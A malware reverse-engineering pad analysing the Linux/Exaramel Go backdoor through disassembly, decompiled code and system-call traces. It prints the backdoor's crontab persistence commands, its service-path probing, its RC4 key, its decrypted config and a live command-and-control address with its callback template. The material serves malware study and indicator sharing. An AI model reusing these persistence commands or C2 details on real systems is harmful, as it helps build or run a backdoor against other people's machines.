MalwareMustDie

Linux/Exaramel backdoor (RE analysis pad) #MalwareMustDie

Jan 10th, 2020
  1. // Linux/Exaramel (BlackEnergy) - APT ELF malware
  2. // ref: https://www.virustotal.com/gui/file/c39b4105e1b9da1a9cccb1dace730b1c146496c591ce0927fb035d48e9cb5c0f/details
  3. // binary form: Go, built with vendored ("vendor" directory) packages
  4. // quick analysis by @unixfreaxjp on radare2 & tsurugi linux seccon
  5. // *) this is ongoing work; the contents may change. #MalwareMustDie!
  6.  
  7. ###############################
  8. # Summary                     #
  9. ###############################
  10.  
  11. 0. Checking, cloning, and initiating run space.
  12. 1. Uses both a lock file (/tmp/.applock, a unix socket) & a futex to protect the running instance.
  13.    i.e. a new instance of the binary exits because of the lock file; duplicate clones are controlled by the futex
  14. 2. Aims for persistence in cron & systemd startup.
  15. 3. Reads the encrypted config file; if it does not exist, drops the hardcoded encrypted one.
  16. 4. Grabs host information & fills the template for C2 callbacks.
  17. 5. C2 establishment: sends the information after reading the config, then starts listening.
  18. 6. Host resolving uses libnss; networking supports the system proxy.
  19. 7. Supports remote command execution.
  20. 8. My opinion: Developer made work, not crooks.
  21. 9. Comments: https://twitter.com/malwaremustd1e/status/1216466744446840837
  22.  
  23. ###############################
  24. # Binary Analysis             #
  25. ###############################
  26.  
  27. 1. Machine: Advanced Micro Devices X86-64
  28. 2. Symbol table '.symtab' contains 7726 entries.
  29. 3. go build ID
  30. 0x00400fd8  3133 3631 3236 3730 3763 6466 3136 6364  136126707cdf16cd
  31. 0x00400fe8  6133 3231 3562 6561 6435 3833 6331 6665  a3215bead583c1fe
  32. 0x00400ff8  3765 3237 3530 3636 48c7 4424 1000 0000  7e275066H.D$....
  33. Notes at offset 0x00000fc8 with length 0x00000038:
  34.   Owner         Data size       Description
  35.   Go            0x00000028      Unknown note type: (0x00000004)
  36. 4. Program Headers:
  37.   Type           Offset   VirtAddr           PhysAddr           FileSiz  MemSiz   Flg Align
  38.   PHDR           0x000040 0x0000000000400040 0x0000000000400040 0x000188 0x000188 R   0x1000
  39.   NOTE           0x000fc8 0x0000000000400fc8 0x0000000000400fc8 0x000038 0x000038 R   0x4
  40.   LOAD           0x000000 0x0000000000400000 0x0000000000400000 0x248c80 0x248c80 R E 0x1000
  41.   LOAD           0x249000 0x0000000000649000 0x0000000000649000 0x1ac10f 0x1ac10f R   0x1000
  42.   LOAD           0x3f6000 0x00000000007f6000 0x00000000007f6000 0x02f7e0 0x052400 RW  0x1000
  43.   GNU_STACK      0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW  0x8
  44.   LOOS+5041580   0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000     0x8
  45. 5. Go version 1.8 (inferred from the embedded toolchain path below)
  46. /usr/lib/go-1.8/lib/time/zoneinfo.zip
  47.  
  48. ###############################
  49. # Static Reversing Analysis   #
  50. ###############################
  51.  
  52. [0x00455940]> pdf
  53. 18: entry0 (int64_t arg_8h);
  54. │           ; arg int64_t arg_8h @ rsp+0x8
  55. │           0x00455940      488d742408     lea rsi, [arg_8h]
  56. │           0x00455945      488b3c24       mov rdi, qword [rsp]
  57. │           0x00455949      488d05100000.  lea rax, [main] ; sym.go.main
  58. │           ; 0x455960 ; "H\x8d\x05\x89\xc2\xff\xff\xff\xe0\xcc\xcc\xcc\xcc\xcc\xcc\u030b|$\b\xb8\xe7"
  59. └           0x00455950      ffe0           jmp rax
  60. --- more ---
  61.      :
  62. [0x00455940]> s sym.main.main
  63. [0x00647540]> pd 6
  64.             ; CODE XREF from sym.main.main @ 0x648803
  65.             ;-- sym.go.main.main:
  66. 4808: sym.main.main ();
  67. │ bp: 0 (vars 0, args 0)
  68. │ sp: 105 (vars 105, args 0)
  69. │ rg: 0 (vars 0, args 0)
  70. │           0x00647540      64488b0c25f8.  mov rcx, qword fs:[0xfffffffffffffff8]
  71. │           0x00647549      488d842408fc.  lea rax, [rsp - 0x3f8]
  72. │           0x00647551      483b4110       cmp rax, qword [rcx + 0x10]
  73. │     ┌─< 0x00647555      0f86a3120000   jbe 0x6487fe
  74. │     │    0x0064755b      4881ec780400.  sub rsp, 0x478
  75. │     │    0x00647562      4889ac247004.  mov qword [var_470h], rbp
  76. --- more ---
  77.      :
  78. [0x00647540]> pdsf
  79. ;-- sym.go.main.main:                                                  
  80. 0x00647572 call sym.main.getCurrentDir
  81. 0x006475b4 call sym.runtime.concatstring2
  82. 0x006475d0 call sym.time.Now
  83. 0x00647618 call sym.time.Time.String
  84. 0x0064768a call sym.net.Listen
  85. 0x006476d0 call sym.runtime.makechan
  86. 0x00647727 call fcn.00454c1d fcn.00454c1d
  87. 0x006477ba call sym.os_signal.Notify
  88. 0x006477f9 call sym.runtime.newproc
  89. 0x0064783c call sym.runtime.newobject
  90. 0x0064787c call sym.app_vendor_configur.LoadConfig
  91. 0x00647905 obj.main.defaulthost.str // <====== C2 placeholder var
  92. 0x00647968 call sym.app_vendor_configur.UpdateConfig
  93. 0x00647981 call sym.runtime.makechan
  94. 0x006479a7 call sym.runtime.makechan
  95. 0x006479cd call sym.runtime.makechan
  96. 0x006479ea call sym.runtime.newobject
  97. 0x00647a38 call sym.runtime.newobject
  98. 0x00647a63 call fcn.00454c20 fcn.00454c20
  99. 0x00647af4 call fcn.00454f96 fcn.00454f96
  100. 0x00647b01 call sym.app_vendor_worker.__Worker_.CheckAdapt
  101. 0x00647bbd call sym.app_vendor_worker.__Worker_.GetUser
  102. 0x00647be8 call sym.app_vendor_worker.__Worker_.GetOS
  103. 0x00647c27 call sym.runtime.newproc
  104. 0x00647c51 call fcn.00454bfa fcn.00454bfa
  105. 0x00647c77 call sym.runtime.newselect
  106. 0x00647ca2 call sym.runtime.selectrecv
  107. --- more ---
  108.  
  109. // seeking persistence #1 (cron)
  110.  
  111. chdir("/var/spool/cron"), 1) = 0;
  112. execve("/bin/sh", ["/bin/sh", "-c", "(crontab -l 2>/dev/null) | grep /test/Exaramel && echo 'true' || echo 'false'"]) = 0;
  113. execve("/usr/bin/crontab", ["crontab", "-l"]) = 0;
  114. execve("/bin/sh", ["/bin/sh", "-c", "(crontab -l 2>/dev/null; echo '*/1 * * * * /test/Exaramel') | crontab -"]) = 0;
  115. execve("/bin/sh", ["/bin/sh", "-c", "(crontab -l 2>/dev/null; echo '@reboot /test/Exaramel') | crontab -"]) = 0;
  116.  
  117. // persistence #2 (probing for init / systemd service paths)
  118.  
  119. stat("/etc/rc.d/syslogger",..) = 0;
  120. stat("/etc/init/syslogd.conf",..) = 0;
  121. stat("/etc/systemd/system/syslogd.service",..) = 0;
  122. stat("/etc/init.d/syslogd",..) = 0;
  123.  
  124. // check user
  125.  
  126. execve("/bin/sh", ["/bin/sh", "-c", "whoami"]
  127.  
  128. // data sent to the C2 uses this hardcoded template:
  129.  
  130. generation=%d&guid=%s&platform=%s&version=%d&whoami=%s%0A
  131.  
  132. // lock run-file (a unix domain socket bound at startup; a second bind fails)
  133.  
  134. "/tmp/.applock"
  135. code: getsockname(3, {sa_family=AF_FILE, path="/tmp/.applock"}, [16])
  136.  
  137. // command execution environment (os/exec is initialised)
  138.  
  139. 0x32676 16 15 os/exec.Command
  140. 0x32686 23 22 os/exec.interfaceEqual
  141. 0x3269d 20 19 os/exec.(*Cmd).envv
  142. 0x326b1 21 20 os/exec.(*Cmd).stdin
  143. 0x326c6 22 21 os/exec.(*Cmd).stdout
  144. 0x326dc 22 21 os/exec.(*Cmd).stderr
  145. 0x326f2 32 31 os/exec.(*Cmd).writerDescriptor
  146. 0x32712 32 31 os/exec.(*Cmd).closeDescriptors
  147. 0x32732 21 20 os/exec.(*Cmd).Start
  148. 0x32747 27 26 os/exec.(*ExitError).Error
  149. 0x32762 20 19 os/exec.(*Cmd).Wait
  150. 0x32776 26 25 os/exec.(*Cmd).StdoutPipe
  151. 0x32790 26 25 os/exec.(*Cmd).StderrPipe
  152. 0x327aa 15 14 os/exec.init.1
  153. 0x327b9 23 22 os/exec.findExecutable
  154. 0x327d0 17 16 os/exec.LookPath
  155. 0x327e1 29 28 os/exec.interfaceEqual.func1
  156. 0x327fe 27 26 os/exec.(*Cmd).stdin.func1
  157. 0x32819 38 37 os/exec.(*Cmd).writerDescriptor.func1
  158. 0x3283f 27 26 os/exec.(*Cmd).Start.func1
  159. 0x3285a 27 26 os/exec.(*Cmd).Start.func2
  160. 0x32875 21 20 os/exec.init.1.func1
  161. 0x3288a 13 12 os/exec.init <====
  162. --- more ---
  163.      :
  // Decompiler pseudo-C (radare2 listing of the Exaramel ELF) for the Go package
  // initialiser of os/exec. This is recovered output, not original source: Go
  // initialisers take no arguments, so param_1..param_3 are the decompiler's
  // rendering of live registers rather than real parameters.
  // NOTE(review): the leading `while` is how the decompiler renders Go's stack-bounds
  // prologue (compare the stack pointer against the stack guard reached via fs:-8 + 0x10,
  // call runtime.morestack_noctxt and retry) - it is not a program-level loop. The
  // `*(BADSPACEBASE **)0x20` expression appears to stand for rsp; confirm against the
  // disassembly of this function at 0x623e10.
  164. void sym.os_exec.init(undefined8 param_1, undefined8 param_2, int64_t param_3)
  165. {
  166.     uint64_t *puVar1;
  167.     int64_t extraout_RDX;
  168.     int64_t in_FS_OFFSET;
  169.     undefined8 uStack24;
  170.     undefined8 uStack16;
  171.  
  172.     while (puVar1 = (uint64_t *)(*(int64_t *)(in_FS_OFFSET + 0xfffffff8) + 0x10),
  173.           *(BADSPACEBASE **)0x20 < (undefined *)*puVar1 || (undefined *)*(BADSPACEBASE **)0x20 == (undefined *)*puVar1)
  174.     {
  175.         sym.runtime.morestack_noctxt(param_1, param_2, param_3);
  176.         param_3 = extraout_RDX;
  177.     }
           // initdone is the per-package init state byte: a value above 1 (2 is stored
           // at the end of this function) means the package is already initialised.
  178.     if (1 < (uint8_t)obj.os_exec.initdone.) {
  179.         return;
  180.     }
           // Re-entering while the state is 1 (init in progress) is an init cycle:
           // runtime.throwinit aborts; the endless loop is the decompiler's view of the
           // trap instruction that follows the call (presumably ud2, as in main.init).
  181.     if (obj.os_exec.initdone. == (code)0x1) {
  182.         sym.runtime.throwinit();
  183.         do {
  184.             invalidInstructionException();
  185.         } while( true );
  186.     }
  187.     obj.os_exec.initdone. = (code)0x1;
           // Initialise the packages os/exec depends on, in linker-emitted order.
  188.     sym.bytes.init();
  189.     sym.context.init();
  190.     sym.io.init();
  191.     sym.os.init();
  192.     sym.path_filepath.init();
  193.     sym.runtime.init();
  194.     sym.strconv.init();
  195.     sym.strings.init();
  196.     sym.sync.init();
  197.     sym.syscall.init();
           // errors.New returns a two-word interface value on the stack (uStack24/uStack16);
           // the first word is stored into the package-level ErrNotFound directly, the
           // second goes through the GC write barrier when it is enabled. 0x826548 is
           // presumably the second word of ErrNotFound, unresolved by the decompiler.
  198.     sym.errors.New();
  199.     _obj.os_exec.ErrNotFound = uStack24;
  200.     if (_obj.runtime.writeBarrier == 0) {
  201.         *(undefined8 *)0x826548 = uStack16;
  202.     } else {
  203.         sym.runtime.writebarrierptr();
  204.     }
           // Package-level init.1 (listed in the symbol table above), then mark done.
  205.     sym.os_exec.init.1();
  206.     obj.os_exec.initdone. = (code)0x2;
  207.     return;
  208. }
  209.       :
  210. ; CALL XREF from sym.app_vendor_worker.init @ 0x64623b
  211. ;-- sym.go.os_exec.init:
  212. / 234: sym.os_exec.init ();
  213. | bp: 0 (vars 0, args 0)
  214. | sp: 4 (vars 4, args 0)
  215. | rg: 0 (vars 0, args 0)
  216. |           0x00623e10      mov rcx, qword fs:[0xfffffffffffffff8]
  217. |           0x00623e19      cmp rsp, qword [rcx + 0x10]
  218. |       ,=< 0x00623e1d      jbe 0x623ef0
  219. |       |   0x00623e23      sub rsp, 0x28
  220. ; ---------------------------
  221. |       :   0x0064623b      call sym.os_exec.init                      ;[1]
  222. |       :   0x00646240      call sym.path_filepath.init                ;[2]
  223. |       :   0x00646245      call sym.regexp.init                       ;[3]
  224. |       :   0x0064624a      call sym.runtime.init                      ;[4]
  225. |       :   0x0064624f      call sym.strconv.init                      ;[5]
  226. |       :   0x00646254      call sym.strings.init                      ;[6]
  227. |       :   0x00646259      call sym.syscall.init                      ;[7]
  228. |       :   0x0064625e      call sym.time.init                         ;[8]
  229. |       :   0x00646263      mov byte [obj.app_vendor_worker.initdone.], 2    ; [0x843345:1]=0
  230. |       :   0x0064626a      mov rbp, qword [rsp]
  231. |       :   0x0064626e      add rsp, 8
  232. --- more ---
  233.      :
  234. ; CALL XREF from sym.main.init @ 0x648a74
  235. ;-- sym.go.app_vendor_worker.init:
  236. / 173: sym.app_vendor_worker.init ();
  237. | bp: 0 (vars 0, args 0)
  238. | sp: 0 (vars 0, args 0)
  239. | rg: 0 (vars 0, args 0)
  240. |           0x006461d0      mov rcx, qword fs:[0xfffffffffffffff8]
  241. |           0x006461d9      cmp rsp, qword [rcx + 0x10]
  242. |       ,=< 0x006461dd      jbe 0x646273
  243. |       |   0x006461e3      sub rsp, 8
  244. ; ---------------------------
  245. |       :   0x00648a74      call sym.app_vendor_worker.init            ;[1]
  246. |       :   0x00648a79      call sym.app_vendor_github.com_satori_go_2euuid.init ;[2]
  247. |       :   0x00648a7e      mov byte [obj.main.initdone.], 2           ; [0x843374:1]=0
  248. |       :   0x00648a85      mov rbp, qword [rsp]
  249. |       :   0x00648a89      add rsp, 8
  250. |       :   0x00648a8d      ret
  251. |       :   ; CODE XREF from sym.main.init @ 0x6489fd
  252. |       :   0x00648a8e      call sym.runtime.morestack_noctxt          ;[3]
  253. \       `=< 0x00648a93      jmp sym.main.init
  254.             0x00648a98      int3
  255.             0x00648a99      int3
  256. --- more ---
  257.      :
  258. [0x00648a23 [xAdvc]0 0% 180 Exaramel]> pd $r @ sym.main.init+51 # 0x648a23
  259. |       :   ; CODE XREF from sym.main.init @ 0x648a18
  260. |      ,==< 0x00648a23      7507           jne 0x648a2c
  261. |      |:   0x00648a25      e896e8ddff     call sym.runtime.throwinit  ;[1]
  262. |      |:   0x00648a2a      0f0b           ud2
  263. |      |:   ; CODE XREF from sym.main.init @ 0x648a23
  264. |      `--> 0x00648a2c      c60541a91f00.  mov byte [obj.main.initdone.], 1    ; [0x843374:1]=0
  265. |       :   0x00648a33      e8d837e9ff     call sym.app_vendor_configur.init ;[2]
  266. |       :   0x00648a38      e82310e7ff     call sym.fmt.init           ;[3]
  267. |       :   0x00648a3d      e89e48e9ff     call sym.math_rand.init     ;[4]
  268. |       :   0x00648a42      e8896becff     call sym.net.init           ;[5]
  269. |       :   0x00648a47      e804bcfcff     call sym.app_vendor_network.init ;[6]
  270. |       :   0x00648a4c      e8efdde4ff     call sym.os.init            ;[7]
  271. |       :   0x00648a51      e86ad3fcff     call sym.os_signal.init     ;[8]
  272. |       :   0x00648a56      e8e51ce9ff     call sym.path_filepath.init ;[9]
  273. |       :   0x00648a5b      e8b02cfdff     call sym.app_vendor_scheduler.init ;[?]
  274. |       :   0x00648a60      e8cbd8e1ff     call sym.strconv.init       ;[?]
  275. |       :   0x00648a65      e8b6afe7ff     call sym.strings.init       ;[?]
  276. |       :   0x00648a6a      e80172e3ff     call sym.syscall.init       ;[?]
  277. |       :   0x00648a6f      e83c6ee4ff     call sym.time.init          ;[?]
  278. |       :   0x00648a74      e857d7ffff     call sym.app_vendor_worker.init ;[?]
  279. |       :   0x00648a79      e8f2e6ffff     call sym.app_vendor_github.com_satori_go_2euuid.init ;[?]
  280. |       :   0x00648a7e      c605efa81f00.  mov byte [obj.main.initdone.], 2    ; [0x843374:1]=0
  281. |       :   0x00648a85      488b2c24       mov rbp, qword [rsp]
  282. |       :   0x00648a89      4883c408       add rsp, 8
  283. |       :   0x00648a8d      c3             ret
  284. --- more ---
  285.      :
  286.     if (1 < (uint8_t)obj.main.initdone.) {
  287.         return;
  288.     }
  289.     if (obj.main.initdone. == (code)0x1) {
  290.         sym.runtime.throwinit();
  291.         do {
  292.             invalidInstructionException();
  293.         } while( true );
  294.     }
  295.     obj.main.initdone. = (code)0x1;
  296.     sym.app_vendor_configur.init();
  297.     sym.fmt.init();
  298.     sym.math_rand.init();
  299.     sym.net.init();
  300.     sym.app_vendor_network.init();
  301.     sym.os.init();
  302.     sym.os_signal.init();
  303.     sym.path_filepath.init();
  304.     sym.app_vendor_scheduler.init();
  305.     sym.strconv.init();
  306.     sym.strings.init();
  307.     sym.syscall.init();
  308.     sym.time.init();
  309.     sym.app_vendor_worker.init();
  310.     sym.app_vendor_github.com_satori_go_2euuid.init();
  311.     obj.main.initdone. = (code)0x2;
  312.     return;
  313. }
  314.  
  315. // proxy support (Go net/http ProxyFromEnvironment / ProxyURL code is present):
  316.  
  317. 0x005f8bc0   42 1298         sym.net_http.ProxyFromEnvironment
  318. 0x005f90e0    6 141          sym.net_http.ProxyURL
  319. 0x005fad00    7 248          sym.net_http.__connectMethod_.proxyAuth
  320. 0x005ffa30   67 1631         sym.net_http.useProxy
  321. 0x00607600    1 28           sym.net_http.ProxyURL.func1
  322. --- more ---
  323.      :
  324. 0x9788ea 36 35 net/http.(*connectMethod).proxyAuth
  325. 0x97961f 18 17 net/http.useProxy
  326. 0x97b757 24 23 net/http.ProxyURL.func1
  327. 0x9dbc43 22 21 net/http.httpProxyEnv
  328. 0x9dbc6d 23 22 net/http.httpsProxyEnv
  329. 0x9dc038 20 19 net/http.noProxyEnv
  330. 0x768d   22 21 net/http.httpProxyEnv
  331. 0x76a3   23 22 net/http.httpsProxyEnv
  332. 0x78de   20 19 net/http.noProxyEnv
  333. 0x2e857  30 29 net/http.ProxyFromEnvironment
  334. 0x2e875  18 17 net/http.ProxyURL
  335. --- more ---
  336.      :
  // Decompiler pseudo-C for net/http.(*connectMethod).proxyAuth from the Go 1.8
  // standard library linked into the binary (see the symbol list above), not
  // malware-specific code. Go passes the receiver and results on the stack, so
  // in_stack_00000008 is the *connectMethod receiver and the `void` return is the
  // decompiler missing the string result; param_1..param_3 are register noise.
  // NOTE(review): the leading `while` is the rendering of Go's stack-bounds prologue
  // (stack guard via fs:-8 + 0x10, runtime.morestack_noctxt), not a real loop; compare
  // with the disassembly at 0x5fad00.
  337. void sym.net_http.__connectMethod_.proxyAuth(undefined8 param_1, undefined8 param_2, int64_t param_3)
  338. {
  339.     uint64_t *puVar1;
  340.     int64_t extraout_RDX;
  341.     int64_t in_FS_OFFSET;
  342.     int64_t *in_stack_00000008;
  343.     undefined8 in_stack_00000010;
  344.     undefined8 in_stack_00000018;
  345.  
  346.     while (puVar1 = (uint64_t *)(*(int64_t *)(in_FS_OFFSET + 0xfffffff8) + 0x10),
  347.           *(BADSPACEBASE **)0x20 < (undefined *)*puVar1 || (undefined *)*(BADSPACEBASE **)0x20 == (undefined *)*puVar1)
  348.     {
  349.         sym.runtime.morestack_noctxt(param_1, param_2, param_3);
  350.         param_3 = extraout_RDX;
  351.     }
           // First word of the receiver is non-nil (presumably cm.proxyURL) and the field
           // at +0x20 of that URL is non-nil (presumably the URL's user info): build the
           // credential with basicAuth and concatenate it with a prefix - consistent with
           // the Go source returning "Basic " + basicAuth(user, password); verify against
           // the Go 1.8 net/http source. Every other path returns the empty string.
  352.     if (*in_stack_00000008 != 0) {
  353.         if (*(int64_t *)(*in_stack_00000008 + 0x20) != 0) {
  354.             sym.net_http.basicAuth();
  355.             sym.runtime.concatstring2();
  356.             return;
  357.         }
  358.         return;
  359.     }
  360.     return;
  361. }
  362. --- more ---
  363.      :
  364.  ; CODE XREF from sym.net_http.__connectMethod_.proxyAuth @ 0x5fadf3
  365.  ; CALL XREFS from sym.net_http.__Transport_.dialConn @ 0x5fe1b1, 0x5ff325
  366.  ;-- sym.go.net_http.__connectMethod_.proxyAuth:
  367. / 248: sym.net_http.__connectMethod_.proxyAuth (int64_t arg_8h, int64_t arg_10h, int64_t arg_18h);
  368. | bp: 0 (vars 0, args 0)
  369. | sp: 10 (vars 7, args 3)
  370. | rg: 0 (vars 0, args 0)
  371. |           0x005fad00      mov rcx, qword fs:[0xfffffffffffffff8]
  372. |           0x005fad09      cmp rsp, qword [rcx + 0x10]
  373. |       ,=< 0x005fad0d      jbe 0x5fadee
  374. |       |   0x005fad13      sub rsp, 0x40
  375. ; ---------------------------
  376. |           0x005fe1b1      call sym.net_http.__connectMethod_.proxyAuth ;[1] M=======
  377. |           0x005fe1b6      mov rax, qword [var_4b0h]
  378. |           0x005fe1bb      mov rcx, qword [var_4b8h]
  379. |           0x005fe1c0      test rax, rax
  380. |       ,=< 0x005fe1c3      jne 0x5ff1c6
  381. |       |   ; CODE XREF from sym.net_http.__Transport_.dialConn @ 0x5ff1fa
  382. |       |   0x005fe1c9      lea rax, [0x0068f0a0]
  383. |       |   0x005fe1d0      mov qword [rsp], rax
  384. |       |   0x005fe1d4      mov rax, qword [var_300h]
  385. |       |   0x005fe1dc      mov qword [var_4b8h], rax
  386. |       |   0x005fe1e1      mov rcx, qword [var_2f8h]
  387. --- more ---
  388.      :
  389. ;-- sym.go.net_http.__Transport_.dialConn:
  390. 0x005fda2d call sym.runtime.newobject
  391. 0x005fda58 int64_t arg1
  392. 0x005fda5c int64_t arg2
  393. 0x005fda6e call fcn.00454fa4 fcn.00454fa4
  394. 0x005fda7b call sym.net_http.__connectMethod_.key
  395. 0x005fda80 int64_t arg2
  396. 0x005fda85 int64_t arg1
  397. 0x005fda97 call fcn.00454f96 fcn.00454f96
  398. 0x005fdab4 call sym.runtime.makechan
  399.    :
  400. 0x005fdb69 call sym.runtime.newobject
  401. 0x005fdbad int64_t arg2
  402. 0x005fdbbf call fcn.00454f96 fcn.00454f96
  403. 0x005fdc8f call sym.net_http_httptrace.ContextClientTrace
  404. 0x005fdd41 call sym.net_http.__connectMethod_.addr ;"tcp ->  <== ==> @@@ MB) \r\t\n as  at  fp= in  is  lr: of  on  pc= sp: sp=!= 0%x\r\n&gt;&lt;'\'"
  405. 0x005fdd7d call rcx
  406. 0x005fde21 call sym.crypto_tls.__Conn_.Handshake
  407. 0x005fde70 call sym.runtime.newproc
  408. 0x005fdeeb call fcn.00454f34 fcn.00454f34
  409. 0x005fdf17 call rbx
  410. 0x005fdf29 call sym.runtime.newobject
  411. 0x005fdf47 call sym.crypto_tls.__Conn_.ConnectionState
  412. --- end ---
  413.  
  414. // drop config
  415.  
  416. openat(AT_FDCWD, "{current dir}config.json", 1|2|0|0, 0666) = 0 ;
  417.  
  418. // the data below is written to it encrypted (call: Go crypto RC4 library)
  419.  
  420. 0x006f9990  6874 7470 733a 2f2f 3137 362e 3331 2e32  https://176.31.2
  421. 0x006f99a0  3235 2e32 3034 2f61 7069 2f76 3100 0000  25.204/api/v1...
  422.  
  423. // encryption key :
  424.  
  425. in:
  426. [0x006da25a [xAdvc]0 37% 16384 Exaramel]> pd $r @ hit2_0
  427.         ; DATA XREFS from sym.main.main @ 0x647823, 0x6486eb  
  428. │        0x00647787      488d8c249800.  lea rcx, [var_98h]
  429. │        0x0064778f      48898c24b002.  mov qword [var_2b0h], rcx
  430. │        0x00647797      48890424       mov qword [rsp], rax
  431. │        0x0064779b      488d8c247802.  lea rcx, [var_278h]
  432. │        0x006477a3      48894c2408     mov qword [var_8h], rcx
  433. │        0x006477a8      48c744241004.  mov qword [var_10h], 4
  434. │        0x006477b1      48c744241804.  mov qword [var_18h], 4
  435. │        0x006477ba      e8e1defcff     call sym.os_signal.Notify
  436. │        0x006477bf      488b84242001.  mov rax, qword [var_120h]
  437. │        0x006477c7      4889442410     mov qword [var_10h], rax
  438. │        0x006477cc      488b84244001.  mov rax, qword [var_140h]
  439. │        0x006477d4      4889442418     mov qword [var_18h], rax
  440. │        0x006477d9      488b8c244801.  mov rcx, qword [var_148h]
  441. │        0x006477e1      48894c2420     mov qword [var_20h], rcx
  442. │        0x006477e6      c70424180000.  mov dword [rsp], 0x18
  443. │        0x006477ed      488d1534160a.  lea rdx, [0x006e8e28]
  444. │        0x006477f4      4889542408     mov qword [var_8h], rdx
  445. │        0x006477f9      e8729cdeff     call sym.runtime.newproc
  446. │        0x006477fe      488b05c3e71d.  mov rax, qword [0x00825fc8]
  447. │        0x00647805      4885c0         test rax, rax
  448. │  ┌─< 0x00647808      7527           jne 0x647831  
  449. │  │    0x0064780a      48c705b3e71d.  mov qword [0x00825fc8], 0xa
  450. │  │    0x00647815      8b0515bf1f00   mov eax, dword [obj.runtime.writeBarrier]
  451. │  │    0x0064781b      85c0           test eax, eax
  452. │┌──< 0x0064781d      0f85bd0e0000   jne 0x6486e0  
  453. │││    0x00647823      488d05302a09.  lea rax, [hit2_0] ; 0x6da25a ; "s0m3t3rr0r" <======KEY!!
  454. │││    0x0064782a      4889058fe71d.  mov qword [obj.main.key], rax
  455. --- more ---
  456.      :
  457. 0x006da25a [xAdvc]0 37% 16384 Exaramel]> ps
  458. 0x006da25a <nil>runtime: s0m3t3rr0r(++junk)
  459.  
  460. // config
  461.  
  462. ~/test$ r2 config.json
  463.  -- Invert the block bytes using the 'I' key in visual mode
  464. [0x00000000]> px
  465. - offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
  466. 0x00000000  4f65 e400 ded5 2b33 3a61 37b5 1fd8 ffdf  Oe....+3:a7.....
  467. 0x00000010  9f57 b918 6d1e e9b8 8116 057f a636 08e2  .W..m........6..
  468. 0x00000020  4b5a 15c1 57a1 a0e9 1297 49e8 2942 8f78  KZ..W.....I.)B.x
  469. 0x00000030  e267 95ad aead 0846 5074 d17f 9eab e8c6  .g.....FPt......
  470. 0x00000040  7c29 d378 4fd7 5071 c311 53f5 de02 32d0  |).xO.Pq..S...2.
  471. 0x00000050  3e93 45e8 de72 a424 70fb 00e0 f30f 5be0  >.E..r.$p.....[.
  472. 0x00000060  37eb 47a9 d57e ebee 583f 339c 5672 23c4  7.G..~..X?3.Vr#.
  473. 0x00000070  adbf d997 2f99 5a7f 063c 9ba5 7028 15b7  ..../.Z..<..p(..
  474. 0x00000080  3ce6 da90 98ae 8c34 f8b2 0331 a445 d517  <......4...1.E..
  475. 0x00000090  a946 173b c506 c450 0f9e 6a48 d068 b6c8  .F.;...P..jH.h..
  476. 0x000000a0  ffff ffff ffff ffff ffff ffff ffff ffff  ................
  477.  
  478. // the file is RC4-encrypted with the key above; decrypting it with any RC4 implementation gives:
  479.  
  480. {"Hosts":["https://176.31.225.204/api/v1"],"Proxy":"","Version":"1","Guid":"c65f5f15-2e64-4b41-9c95-59f0d94f5fca","Next":20,"Datetime":"","Timeout":30,"Def":20}
  481.  
  482. // c2
  483.  
  484. 0x6f9990 30 29 https://176.31.225.204/api/v1
  485.  
  486. // the C2 callback can be observed on:
  487.  
  488. connect(6, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("176.31.225.204")
  489.  
  490. // file enumeration (this happens before the C2 networking starts, per clone)
  491.  
  492. getdents64($SOCKET, {{d_ino=$INODENUM, d_off=$OFFSETNUM,..
  493. loop
  494.  {
  495.    lstat("{$CURRPATH}/{files}"..);
  496.    openat(AT_FDCWD, "{$CURRPATH}/{$DIRS}"..
  497.   }
  498. getdents64($SOCKET, {}, $MMAP);
  499. close($SOCKET);
  500.  
  501. ###############################
  502. # Dynamic Analysis            #
  503. ###############################
  504.  
  505. // it runs; process memory map and open file descriptors:
  506.  
  507. 00400000-00649000 r-xp 00000000 08:01 397381             /test/Exaramel
  508. 00649000-007f6000 r--p 00249000 08:01 397381             /test/Exaramel
  509. 007f6000-00826000 rw-p 003f6000 08:01 397381             /test/Exaramel
  510. 00826000-00849000 rw-p 00000000 00:00 0
  511. c000000000-c000001000 rw-p 00000000 00:00 0
  512. c41fff8000-c420100000 rw-p 00000000 00:00 0
  513. 7f32836ed000-7f328378d000 rw-p 00000000 00:00 0
  514. 7fff6fc00000-7fff6fc21000 rw-p 00000000 00:00 0          [stack]
  515. 7fff6fdb9000-7fff6fdba000 r-xp 00000000 00:00 0          [vdso]
  516. ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0  [vsyscall]
  517.  
  518. Exaramel  cwd    DIR                8,1     4096  397369 /test
  519. Exaramel  rtd    DIR                8,1     4096       2 /
  520. Exaramel  txt    REG                8,1  6469139  397381 /test/Exaramel
  521. Exaramel    0u   CHR              136,0      0t0       3 /dev/pts/0
  522. Exaramel    1u   CHR              136,0      0t0       3 /dev/pts/0
  523. Exaramel    2u   CHR              136,0      0t0       3 /dev/pts/0
  524. Exaramel    3u  unix 0xffff88000f2c6480      0t0    6334 /tmp/.applock
  525. Exaramel    4u  0000                0,9        0    1203 anon_inode
  526. Exaramel    5r   CHR                1,9      0t0    1210 /dev/urandom
  527. Exaramel    6r  FIFO                0,8      0t0    6350 pipe
  528. Exaramel    8r  FIFO                0,8      0t0    6351 pipe
  529.  
  530. Exaramel  cwd    DIR                8,1     4096  397369 /test
  531. Exaramel  rtd    DIR                8,1     4096       2 /
  532. Exaramel  txt    REG                8,1  6469139  397381 /test/Exaramel
  533. Exaramel    0u   CHR              136,0      0t0       3 /dev/pts/0
  534. Exaramel    1u   CHR              136,0      0t0       3 /dev/pts/0
  535. Exaramel    2u   CHR              136,0      0t0       3 /dev/pts/0
  536. Exaramel    3u  unix 0xffff88000f2c6480      0t0    6334 /tmp/.applock
  537. Exaramel    4u  0000                0,9        0    1203 anon_inode
  538. Exaramel    5r   CHR                1,9      0t0    1210 /dev/urandom
  539. Exaramel    6r  IPv4               6424      0t0     TCP $LOCAL:34573->176.31.225.204:443
  540.  
  541. Exaramel  cwd    DIR                8,1     4096  397369 /test
  542. Exaramel  rtd    DIR                8,1     4096       2 /
  543. Exaramel  txt    REG                8,1  6469139  397381 /test/Exaramel
  544. Exaramel    0u   CHR              136,0      0t0       3 /dev/pts/0
  545. Exaramel    1u   CHR              136,0      0t0       3 /dev/pts/0
